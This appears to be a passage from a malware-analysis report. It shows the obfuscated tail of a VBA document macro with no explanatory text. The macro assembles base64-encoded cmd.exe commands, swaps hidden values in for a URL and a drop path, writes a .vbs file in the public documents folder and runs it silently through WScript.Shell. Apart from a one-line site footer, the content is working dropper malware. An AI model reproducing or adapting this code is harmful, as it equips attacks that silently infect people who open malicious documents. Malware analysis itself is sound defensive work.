d69225c9d44d966a6b64159c37cb00f4 = a5faf0421edaedabb50af61309bf3a50 + 4566
d5a6022e97e414576d538de41bec2e8e = "Jldl4oYSwgIi8iXikgXisgMSwgTGVuXihhXileKSAmIGVjaG8gU2V0IGMgPSBDcmVh"
ba79ab39178f76a4fa88a7b71f36fac4 = 75454 + a5faf0421edaedabb50af61309bf3a50
b03c3a03a9a04250feb76a8b13865dbe = String(bc798b1913e5da6aa35dbc9ed5de99ec - Len(b03c3a03a9a04250feb76a8b13865dbe), "0") & b03c3a03a9a04250feb76a8b13865dbe
f7eb61a29a5d75f66ecba4be1fafe180 = Chr(CByte("&H" & Mid(b03c3a03a9a04250feb76a8b13865dbe, 1, 2))) + Chr(CByte("&H" & Mid(b03c3a03a9a04250feb76a8b13865dbe, 3, 2))) + Chr(CByte("&H" & Mid(b03c3a03a9a04250feb76a8b13865dbe, 5, 2)))
ce359afb8d5615d34553f2575844de80 = ce359afb8d5615d34553f2575844de80 & Left(f7eb61a29a5d75f66ecba4be1fafe180, f22a3bf293afba2159c18e9ee0ae2c8d): Next
ce359afb8d5615d34553f2575844de80 = Replace(ce359afb8d5615d34553f2575844de80, "https://www.google.com/images/srpr/logo1w.png", beaf92e375bfe5778fa0d1fc4e1dd473)
f339b79ad13d0ba88bbbf63181df38d8 = "gSWYgZC5GaWxlRXhpc3RzXi"
ce359afb8d5615d34553f2575844de80 = Replace(ce359afb8d5615d34553f2575844de80, "c:\users\public\documents", ce2796d03fc5bb94655c5e9467628721)
e8d56032105d2c3df35ee8de7be4e089 = "Y21kLmV4ZSAvYyBjZCBjOlx1c2Vyc1xwdWJsaWNcZG9jdW1lbnRzICYgKGVjaG8gYSA9ICJ"
ce359afb8d5615d34553f2575844de80 = Replace(ce359afb8d5615d34553f2575844de80, "x.vbv", "x.vbs")
CreateObject("WScript.Shell").Run (ce359afb8d5615d34553f2575844de80), 0, True
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.